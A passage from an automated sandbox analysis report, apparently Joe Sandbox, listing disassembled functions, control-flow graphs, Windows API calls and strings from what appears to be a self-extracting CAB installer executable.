                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0d7ca036dae94d16dd847209190d22f1c3a812ec600e542fc6764ba29da7bc41
                                                              • Instruction ID: 7de958ec41aa2e3604f22314a3e00429e408094b2b6b3c904f2e6d900b587b9f
                                                              • Opcode Fuzzy Hash: 0d7ca036dae94d16dd847209190d22f1c3a812ec600e542fc6764ba29da7bc41
                                                              • Instruction Fuzzy Hash: 5CE1CD70524361EFC710CF68D440A5ABBE1BF88324F158A99F8999B352C379EE95CF81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00215E0B Relevance: 59.7, APIs: 18, Strings: 16, Instructions: 220synchronizationCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 215e0b-215e48 call 22de40 call 2195c3 5 215e54-215e63 call 219663 0->5 6 215e4a-215e4f 0->6 11 215e65-215e6a 5->11 12 215e6f-215e7b call 2199d2 5->12 7 21603d-216045 call 21854a 6->7 15 21606e-216073 7->15 11->7 19 215e87-215e9c SetEnvironmentVariableW 12->19 20 215e7d-215e82 12->20 17 216075-216076 call 219663 15->17 18 21607b-21607f 15->18 17->18 22 216081-216084 call 218e6f 18->22 23 216089-21608d 18->23 27 215ec9-215ed5 SetEnvironmentVariableW 19->27 28 215e9e-215ea8 GetLastError 19->28 20->7 22->23 25 216097-216099 23->25 26 21608f-216092 call 218e6f 23->26 32 2160a1-2160a7 25->32 33 21609b-21609c call 218e6f 25->33 26->25 30 215f02-215f11 SetEnvironmentVariableW 27->30 31 215ed7-215ee1 GetLastError 27->31 34 215eb8 28->34 35 215eaa-215eb6 28->35 41 215f13-215f1d GetLastError 30->41 42 215f3e-215f44 30->42 38 215ef1 31->38 39 215ee3-215eef 31->39 33->32 36 215eba 34->36 37 215ebf-215ec4 34->37 35->34 36->37 37->7 43 215ef3 38->43 44 215ef8-215efd 38->44 39->38 45 215f2d 41->45 46 215f1f-215f2b 41->46 47 215f81-215f91 call 219779 42->47 48 215f46-215f54 SetEnvironmentVariableW 42->48 43->44 44->7 51 215f34-215f39 45->51 52 215f2f 45->52 46->45 58 215f93-215f98 47->58 59 215f9d-215fdc call 2184c7 CreateProcessW 47->59 48->47 49 215f56-215f60 GetLastError 48->49 53 215f70 49->53 54 215f62-215f6e 49->54 51->7 52->51 56 215f72 53->56 57 215f77-215f7c 53->57 54->53 56->57 57->7 58->7 62 215fea 59->62 63 215fde-215fe8 59->63 64 215fed-215ff7 GetTopWindow 62->64 63->7 65 216016-21601a 64->65 66 215ff9-21600b GetWindowThreadProcessId 65->66 67 21601c-21602b Sleep 65->67 68 21602d-216036 call 2168fb 66->68 69 21600d-216010 GetWindow 66->69 67->64 67->68 72 216047-21606c WaitForSingleObject GetExitCodeProcess CloseHandle * 2 68->72 73 216038 68->73 69->65 72->15 73->7
                                                              APIs
                                                              • _memset.LIBCMT ref: 00215E2A
                                                                • Part of subcall function 002195C3: GetCurrentDirectoryW.KERNEL32(00000040,00000000,00000000,00000000,0023BEF0,?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?), ref: 002195E8
                                                                • Part of subcall function 002195C3: GetCurrentDirectoryW.KERNEL32(00000000,00000000,?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000), ref: 00219607
                                                                • Part of subcall function 002195C3: GetLastError.KERNEL32(?,?,00216F89,0023BEF8,00000000,0023BEF0,?,?,?,00216F09,?,?,00000000,?,?,00215B53), ref: 0021960D
                                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?), ref: 0021604C
                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 00216058
                                                              • CloseHandle.KERNEL32(00215BB4,?,?,?,?,?,?), ref: 00216067
                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0021606C
                                                              Strings
                                                              • Failed to set __COMPAT_LAYER, xrefs: 00215F77
                                                              • Unable to resolve the path of the exe, xrefs: 00215F93
                                                              • Failed to get the name of the module, xrefs: 00215E7D
                                                              • __COMPAT_LAYER, xrefs: 00215F4B
                                                              • _SFX_CAB_EXE_PARAMETERS, xrefs: 00215F08
                                                              • _SFX_CAB_EXE_PACKAGE, xrefs: 00215ECC
                                                              • 2, xrefs: 00216027
                                                              • _SFX_CAB_EXE_PATH, xrefs: 00215E93
                                                              • Failed to set target directory, xrefs: 00215E65
                                                              • Failed to get current directory, xrefs: 00215E4A
                                                              • Failed to stop reporting progress, xrefs: 00216038
                                                              • Failed to set _SFX_CAB_EXE_PACKAGE, xrefs: 00215EF8
                                                              • Failed to set _SFX_CAB_EXE_PATH, xrefs: 00215EBF
                                                              • Failed to start the process, xrefs: 00215FE3
                                                              • Executing command line: '%S', xrefs: 00215FA2
                                                              • Failed to set _SFX_CAB_EXE_PARAMETERS, xrefs: 00215F34
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: CloseCurrentDirectoryHandle$CodeErrorExitLastObjectProcessSingleWait_memset
                                                              • String ID: 2$Executing command line: '%S'$Failed to get current directory$Failed to get the name of the module$Failed to set _SFX_CAB_EXE_PACKAGE$Failed to set _SFX_CAB_EXE_PARAMETERS$Failed to set _SFX_CAB_EXE_PATH$Failed to set __COMPAT_LAYER$Failed to set target directory$Failed to start the process$Failed to stop reporting progress$Unable to resolve the path of the exe$_SFX_CAB_EXE_PACKAGE$_SFX_CAB_EXE_PARAMETERS$_SFX_CAB_EXE_PATH$__COMPAT_LAYER
                                                              • API String ID: 3070882113-3483177241
                                                              • Opcode ID: 680230ed7561845ec5ddb4e8c9ec8b5a43cbd1de70200e96adcb167a446ce212
                                                              • Instruction ID: 2e31dbd1774ea3c6e4881038cdea23c6357c252e9ffd5d4e9af3391937127ead
                                                              • Opcode Fuzzy Hash: 680230ed7561845ec5ddb4e8c9ec8b5a43cbd1de70200e96adcb167a446ce212
                                                              • Instruction Fuzzy Hash: C961E532C30636EFDB219FA49C09AEE7AE5AF74750F164161FE00B6190DB748DF18A90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021805A Relevance: 50.9, APIs: 14, Strings: 15, Instructions: 161COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 74 21805a-218074 75 218228-218232 74->75 76 21807a-21808f call 2187eb 74->76 77 218234-218237 call 218e6f 75->77 78 21823c-218240 75->78 85 218091-218096 76->85 86 21809b-2180a7 GetSystemDirectoryW 76->86 77->78 82 218242-218245 call 218e6f 78->82 83 21824a-21824e 78->83 82->83 87 21821e-21821f call 21854a 85->87 88 2180d4-2180d6 86->88 89 2180a9-2180b3 GetLastError 86->89 97 218224-218227 87->97 93 2180d8-2180e6 call 2187eb 88->93 94 2180fa-218112 call 218b7e 88->94 90 2180c3 89->90 91 2180b5-2180c1 89->91 95 2180c5 90->95 96 2180ca-2180cf 90->96 91->90 93->85 104 2180e8-2180f4 GetSystemDirectoryW 93->104 102 218114-218119 94->102 103 21811e-21812b LoadLibraryW 94->103 95->96 96->87 97->75 102->87 105 218158-21816d GetProcAddress 103->105 106 21812d-218137 GetLastError 103->106 104->89 107 2180f6-2180f8 104->107 110 218173-218182 GetProcAddress 105->110 111 2181f8-218202 GetLastError 105->111 108 218147 106->108 109 218139-218145 106->109 107->89 107->94 114 218149 108->114 115 21814e-218153 108->115 109->108 110->111 116 218184-218193 GetProcAddress 110->116 112 218212 111->112 113 218204-218210 111->113 117 218214 112->117 118 218219 112->118 113->112 114->115 115->87 116->111 119 218195-2181a4 GetProcAddress 116->119 117->118 118->87 119->111 120 2181a6-2181b5 GetProcAddress 119->120 120->111 121 2181b7-2181c6 GetProcAddress 120->121 121->111 122 2181c8-2181d7 GetProcAddress 121->122 122->111 123 2181d9-2181e8 GetProcAddress 122->123 123->111 124 2181ea-2181f1 call 2184c7 123->124 126 2181f6 124->126 126->97
                                                              APIs
                                                                • Part of subcall function 002187EB: GetProcessHeap.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218802
                                                                • Part of subcall function 002187EB: HeapReAlloc.KERNEL32(00000000,?,00000040,00000040,0021917A,00000000,0023BF10,?,?,00216C1A,0000000B,?,?,00216AF8,?), ref: 00218809
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 0021809F
                                                              • GetLastError.KERNEL32 ref: 002180A9
                                                              Strings
                                                              • OpenClusterResource, xrefs: 002181B7
                                                              • %s\clusapi.dll, xrefs: 00218100
                                                              • ClusterResourceControl, xrefs: 002181D9
                                                              • OpenCluster, xrefs: 0021815E
                                                              • ClusterCloseEnum, xrefs: 00218195
                                                              • Failed to get the system directory, xrefs: 002180CA
                                                              • Successfully bound to the ClusApi.dll, xrefs: 002181EA
                                                              • Failed to load clusapi.dll, xrefs: 0021814E
                                                              • ClusterOpenEnum, xrefs: 00218184
                                                              • CloseClusterResource, xrefs: 002181C8
                                                              • Failed to allocate the system directory, xrefs: 00218091
                                                              • CloseCluster, xrefs: 00218173
                                                              • Failed to allocate the path ro the clusapi.dll, xrefs: 00218114
                                                              • ClusterEnum, xrefs: 002181A6
                                                              • Failed to load all required functions from the clusapi.dll, xrefs: 00218219
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$AllocDirectoryErrorLastProcessSystem
                                                              • String ID: %s\clusapi.dll$CloseCluster$CloseClusterResource$ClusterCloseEnum$ClusterEnum$ClusterOpenEnum$ClusterResourceControl$Failed to allocate the path ro the clusapi.dll$Failed to allocate the system directory$Failed to get the system directory$Failed to load all required functions from the clusapi.dll$Failed to load clusapi.dll$OpenCluster$OpenClusterResource$Successfully bound to the ClusApi.dll
                                                              • API String ID: 1959106193-2729475906
                                                              • Opcode ID: 475191e572e7b1e01e6ed32a4434b42322a5b32cb0fe82879e715e16bfd068fe
                                                              • Instruction ID: 874242a337a2395d13b989959bb2be2060e4b7f25cc4eac5d39578658b816def
                                                              • Opcode Fuzzy Hash: 475191e572e7b1e01e6ed32a4434b42322a5b32cb0fe82879e715e16bfd068fe
                                                              • Instruction Fuzzy Hash: B841D476E7070BAAD7126F74ADC5BE935E9AF74314F250025AE08E3181EF74C9F58A10
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021676F Relevance: 26.4, APIs: 12, Strings: 3, Instructions: 122COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 319 21676f-216781 320 216783-216788 319->320 321 21678d-21679f 319->321 322 2168f1-2168f3 320->322 323 2167a5-2167e3 GetModuleHandleW call 219166 InitializeCriticalSection CreateEventA 321->323 324 21689b 321->324 330 216812-216829 CreateThread 323->330 331 2167e5-2167f0 GetLastError 323->331 325 2168a1-2168a4 324->325 327 2168a6-2168ac 325->327 328 2168ec-2168f0 325->328 332 2168bf-2168c6 327->332 333 2168ae-2168b9 DeleteCriticalSection 327->333 328->322 338 216862-216899 WaitForSingleObject SendMessageA * 2 330->338 339 21682b-216836 GetLastError 330->339 334 2167f2-2167fc 331->334 335 2167ff-216802 331->335 336 2168c8-2168c9 call 218e6f 332->336 337 2168ce-2168db 332->337 333->332 334->335 340 216804 335->340 341 21680b-216810 335->341 336->337 343 2168e0-2168e7 337->343 344 2168dd-2168de CloseHandle 337->344 338->324 345 216845-216848 339->345 346 216838-216842 339->346 340->341 347 216856-216860 call 21854a 341->347 343->328 348 2168e9-2168ea CloseHandle 343->348 344->343 349 216851 345->349 350 21684a 345->350 346->345 347->325 348->328 349->347 350->349
                                                              APIs
                                                              • GetModuleHandleW.KERNEL32(00000000,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002167A6
                                                              • InitializeCriticalSection.KERNEL32(0023BF10,00000000,000001F4,?,?,0021635A,00000000,00000002,?,?,?,?,?,?,?,00215B83), ref: 002167C6
                                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002167D6
                                                              • GetLastError.KERNEL32(?,?,0021635A,00000000,00000002,?,?,?,?,?,?,?,00215B83,0023BEF0), ref: 002167E5
                                                              • DeleteCriticalSection.KERNEL32(0023BF10,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168B3
                                                              • CloseHandle.KERNEL32(00000278,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168DE
                                                              • CloseHandle.KERNEL32(00000274,00000002,00000000,00000000,?,?,0021635A,00000000,00000002), ref: 002168EA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Handle$CloseCriticalSection$CreateDeleteErrorEventInitializeLastModule
                                                              • String ID: Failed to create progress reporting initialization event$Failed to create the UI thread$Zc!
                                                              • API String ID: 2625854008-3934491693
                                                              • Opcode ID: a553ba3cf018e95eb570eaaf5fb19e667f0169dd7d5fb53834bb7e617dc13c7d
                                                              • Instruction ID: 07d73a8906a75fc59277c986e40b2b6356dd5355682355d6c7d690d8c3ad9c0b
                                                              • Opcode Fuzzy Hash: a553ba3cf018e95eb570eaaf5fb19e667f0169dd7d5fb53834bb7e617dc13c7d
                                                              • Instruction Fuzzy Hash: C841B170921225EFC7209F64FC4D8DE7BA8FB25760B218426F504F3160D7748AE4DBA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00216A56 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 124windowCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 353 216a56-216a69 354 216b1d-216b24 353->354 355 216a6f 353->355 356 216b76-216b86 GetDlgItem 354->356 357 216b26-216b27 354->357 355->356 358 216a75-216a79 355->358 360 216bc8-216bce 356->360 361 216b88-216b92 GetLastError 356->361 357->356 359 216b29-216b2e 357->359 362 216b14-216b1b PostQuitMessage 358->362 363 216a7f-216a82 358->363 365 216bc4-216bc6 359->365 366 216b34-216b44 GetDlgItem 359->366 367 216bcf-216bd0 SendMessageW 360->367 368 216ba2 361->368 369 216b94-216ba0 361->369 364 216abb-216abe 362->364 370 216af0-216afe call 216be1 363->370 371 216a84-216a89 363->371 364->365 374 216bd6-216bd9 365->374 372 216b46-216b50 GetLastError 366->372 373 216b6e-216b74 366->373 367->374 376 216ba4 368->376 377 216ba9 368->377 369->368 392 216b00-216b06 370->392 393 216b08-216b12 KiUserCallbackDispatcher 370->393 378 216ac3-216acd 371->378 379 216a8b-216a8c 371->379 382 216b60 372->382 383 216b52-216b5e 372->383 373->367 376->377 380 216bae-216bb8 call 21854a 377->380 384 216adc-216aee SetEvent 378->384 385 216acf-216ad2 378->385 379->365 381 216a92-216a98 379->381 380->365 396 216bba-216bbe EndDialog 380->396 381->365 388 216a9e-216aac call 216be1 381->388 389 216b62 382->389 390 216b67-216b6c 382->390 383->382 384->364 385->384 391 216ad4-216ad6 SetWindowTextW 385->391 388->364 398 216aae-216ab5 SendMessageA 388->398 389->390 390->380 391->384 392->364 392->393 393->364 396->365 398->364
                                                              APIs
                                                              • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 00216AB5
                                                              • SetWindowTextW.USER32(?,00F11558), ref: 00216AD6
                                                              • SetEvent.KERNEL32 ref: 00216AE8
                                                              • KiUserCallbackDispatcher.NTDLL(?,00000000), ref: 00216B0C
                                                                • Part of subcall function 00216BE1: EnterCriticalSection.KERNEL32(0023BF10,?,?,?,00216AF8,?), ref: 00216BF2
                                                                • Part of subcall function 00216BE1: MessageBoxW.USER32(?,00000000,00000024,0000000B), ref: 00216C28
                                                                • Part of subcall function 00216BE1: LeaveCriticalSection.KERNEL32(0023BF10,?,?,00216AF8,?), ref: 00216C3E
                                                              • PostQuitMessage.USER32(00000000), ref: 00216B15
                                                              • GetDlgItem.USER32(?,000003E9), ref: 00216B3C
                                                              • GetLastError.KERNEL32 ref: 00216B46
                                                              • GetDlgItem.USER32(?,000003E8), ref: 00216B7E
                                                              • GetLastError.KERNEL32 ref: 00216B88
                                                              • EndDialog.USER32(?,00000000), ref: 00216BBE
                                                              • SendMessageW.USER32(00000000,?,?,?), ref: 00216BD0
                                                              Strings
                                                              • Failed to get progress bar control., xrefs: 00216BA9
                                                              • Failed to get status static control., xrefs: 00216B67
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Message$CriticalErrorItemLastSectionSend$CallbackDialogDispatcherEnterEventLeavePostQuitTextUserWindow
                                                              • String ID: Failed to get progress bar control.$Failed to get status static control.
                                                              • API String ID: 1786187333-1184021424
                                                              • Opcode ID: 79d2dc337cc10dd040854b43ca3da3ffb83c22fd62f632ef0157951c8e860452
                                                              • Instruction ID: 67821a4d82d2d0b223a953175a0cb240fab4e5577a4acab9ec8973ad6216329d
                                                              • Opcode Fuzzy Hash: 79d2dc337cc10dd040854b43ca3da3ffb83c22fd62f632ef0157951c8e860452
                                                              • Instruction Fuzzy Hash: 3F41C332828426ABCB225F14EC0C9ED3AA5EFB0355B258121FD45F60A0DB758FF1DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 0021A505 Relevance: 21.1, APIs: 14, Instructions: 135memoryfileCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 473 21a505-21a531 call 219b6a 476 21a675-21a67b 473->476 477 21a537-21a53d 473->477 478 21a543-21a54d 477->478 479 21a572-21a589 GetProcessHeap RtlReAllocateHeap 478->479 480 21a54f-21a564 GetProcessHeap RtlAllocateHeap 478->480 483 21a603-21a60a 479->483 484 21a58b 479->484 481 21a566-21a56d 480->481 482 21a58e-21a5af ReadFile 480->482 481->476 485 21a5b1-21a5d4 call 21a681 482->485 486 21a60c-21a617 GetLastError 482->486 487 21a658-21a65c 483->487 484->482 485->478 495 21a5da-21a5dc 485->495 490 21a626-21a62a 486->490 491 21a619-21a623 486->491 487->476 489 21a65e-21a66e GetProcessHeap HeapFree 487->489 489->476 493 21a670 call 219a29 489->493 490->487 494 21a62c-21a633 490->494 491->490 493->476 494->487 495->487 497 21a5de-21a5ed GetProcessHeap HeapAlloc 495->497 497->483 498 21a5ef-21a601 GetProcessHeap HeapAlloc 497->498 498->483 499 21a635-21a655 call 231150 * 2 498->499 499->487
                                                              APIs
                                                                • Part of subcall function 00219B6A: SetFilePointerEx.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00219B82
                                                                • Part of subcall function 00219B6A: GetLastError.KERNEL32(?,?,?,0021A52C,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 00219B8C
                                                              • GetProcessHeap.KERNEL32(00000008,00020000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A55A
                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,00215AF6,0023BEF0), ref: 0021A55D
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A57E
                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,00215AF6,0023BEF0), ref: 0021A581
                                                              • ReadFile.KERNELBASE(00000000,00000000,?,00000000,00000000), ref: 0021A5A7
                                                              • GetProcessHeap.KERNEL32(00000008,0023BEF0,00000000,?,?,00215AF6,0023BEF0,?), ref: 0021A5E3
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021A5E6
                                                              • GetProcessHeap.KERNEL32(00000008,8B000006), ref: 0021A5F7
                                                              • HeapAlloc.KERNEL32(00000000), ref: 0021A5FA
                                                              • GetLastError.KERNEL32 ref: 0021A60C
                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00215AF6,0023BEF0), ref: 0021A663
                                                              • HeapFree.KERNEL32(00000000,?,?,00215AF6,0023BEF0), ref: 0021A666
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: Heap$Process$AllocAllocateErrorFileLast$FreePointerRead
                                                              • String ID:
                                                              • API String ID: 15841721-0
                                                              • Opcode ID: 603e9a37c7e2047214e1f472f8b10c162deab81609489541054dceeaf42132d5
                                                              • Instruction ID: 1c85943b6628f93971d6c45801dfad0b784d6be84a80c9580c8cc884e67e0f0f
                                                              • Opcode Fuzzy Hash: 603e9a37c7e2047214e1f472f8b10c162deab81609489541054dceeaf42132d5
                                                              • Instruction Fuzzy Hash: 3A4137B1D1125AFBDF019FE5C948BEEBBB8FF18340F148056E604E6250DB749AA09F91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217AE7 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 105COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1171 217ae7-217b0c SetErrorMode * 2 1172 217b0f-217b1c call 21746a 1171->1172 1175 217b22-217b3d call 218b7e 1172->1175 1176 217bec-217bf1 1172->1176 1182 217bf3-217bf8 1175->1182 1183 217b43-217b55 call 219926 1175->1183 1177 217bff-217c07 call 21854a 1176->1177 1184 217bc4-217bc7 1177->1184 1182->1177 1189 217b5b-217b6b CreateDirectoryW 1183->1189 1190 217bfa 1183->1190 1187 217bd1-217bd4 1184->1187 1188 217bc9-217bcc call 218e6f 1184->1188 1192 217bd6-217bd9 call 218e6f 1187->1192 1193 217bde-217be9 SetErrorMode 1187->1193 1188->1187 1194 217b82-217b84 1189->1194 1195 217b6d-217b76 RemoveDirectoryW 1189->1195 1190->1177 1192->1193 1198 217b86-217b87 call 218e6f 1194->1198 1199 217b8c-217b8f 1194->1199 1195->1194 1197 217b78-217b7c MoveFileExW 1195->1197 1197->1194 1198->1199 1201 217b91-217b94 call 218e6f 1199->1201 1202 217b99-217b9c 1199->1202 1201->1202 1204 217ba6-217baf 1202->1204 1205 217b9e-217ba1 call 218e6f 1202->1205 1207 217bb1-217bbb 1204->1207 1208 217c09-217c0b 1204->1208 1205->1204 1207->1172 1209 217bc1-217bc3 1207->1209 1208->1193 1209->1184
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000000,00000000,?,?,?,?,?,002178B7,?,?), ref: 00217B01
                                                              • SetErrorMode.KERNELBASE(00000000,?,?,?,002178B7,?,?,?,?,?,?,?,?,?,?,00216F09), ref: 00217B0A
                                                                • Part of subcall function 0021746A: UuidCreate.RPCRT4(?), ref: 00217496
                                                                • Part of subcall function 0021746A: RpcStringFreeW.RPCRT4(00000000), ref: 002174FF
                                                              • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B60
                                                              • RemoveDirectoryW.KERNELBASE(?,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B6E
                                                              • MoveFileExW.KERNEL32(?,00000000,00000004,?,?,?,?,?,?,?,002178B7,?,?), ref: 00217B7C
                                                              • SetErrorMode.KERNELBASE(?,?,?,?,?,002178B7,?,?), ref: 00217BE1
                                                              Strings
                                                              • Unable to generate random directory name, xrefs: 00217BF3
                                                              • %s%s, xrefs: 00217B2B
                                                              • Unable to generate random name, xrefs: 00217BEC
                                                              • Failed to allocate long path, xrefs: 00217BFA
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.3251720820.0000000000211000.00000020.00000001.01000000.00000006.sdmp, Offset: 00210000, based on PE: true
                                                              • Associated: 00000002.00000002.3250057680.0000000000210000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3253461305.000000000023A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000002.00000002.3255480981.000000000023E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_210000_G5K9HNJ7.jbxd
                                                              Similarity
                                                              • API ID: ErrorMode$CreateDirectory$FileFreeMoveRemoveStringUuid
                                                              • String ID: %s%s$Failed to allocate long path$Unable to generate random directory name$Unable to generate random name
                                                              • API String ID: 1102146613-1274944306
                                                              • Opcode ID: e1baf9d57c5ba1e808bea14ecea62acabad0645c8d3a42a339c55163cd41adad
                                                              • Instruction ID: 0bee406504460683a8a5c5f0d10d8ded5b39958faae901f3526765f97cdd99c7
                                                              • Opcode Fuzzy Hash: e1baf9d57c5ba1e808bea14ecea62acabad0645c8d3a42a339c55163cd41adad
                                                              • Instruction Fuzzy Hash: 26317071C2825AEFCF11AFE48C858DDBAF8AF65308F21447AE501B2111DB704FE19B90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00217CD0 Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 178COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1210 217cd0-217d00 call 2187eb 1213 217d02 1210->1213 1214 217d14-217d1d call 21805a 1210->1214 1215 217d07-217d0f call 21854a 1213->1215 1220 217d26 1214->1220 1221 217d1f-217d24 1214->1221 1222 217e80-217e83 1215->1222 1223 217d2d-217d32 1220->1223 1221->1215 1224 217e85-217e88 call 218e6f 1222->1224 1225 217e8d-217e90 1222->1225 1228 217d34-217d3e GetLastError 1223->1228 1229 217d5c-217d6a 1223->1229 1224->1225 1226 217e92-217e95 call 218e6f 1225->1226 1227 217e9a-217e9d 1225->1227 1226->1227 1232 217ead-217eb0 1227->1232 1233 217e9f-217ea6 1227->1233 1234 217d40-217d4c 1228->1234 1235 217d4e 1228->1235 1242 217d97-217da4 1229->1242 1243 217d6c-217d76 GetLastError 1229->1243 1240 217ec0-217ec3 1232->1240 1241 217eb2-217eb9 1232->1241 1233->1232 1238 217ea8 1233->1238 1234->1235 1236 217d50 1235->1236 1237 217d55-217d5a 1235->1237 1236->1237 1237->1215 1238->1232 1245 217ed3-217ed8 1240->1245 1246 217ec5-217ecc 1240->1246 1241->1240 1244 217ebb 1241->1244 1249 217e3c-217e45 call 218341 1242->1249 1247 217d86 1243->1247 1248 217d78-217d84 1243->1248 1244->1240 1246->1245 1250 217ece 1246->1250 1252 217d88 1247->1252 1253 217d8d-217d92 1247->1253 1248->1247 1255 217da9-217dac 1249->1255 1256 217e4b-217e50 1249->1256 1250->1245 1252->1253 1253->1215 1258 217e52-217e5d 1255->1258 1259 217db2-217de1 call 2184c7 call 217ee0 1255->1259 1257 217e6b-217e72 call 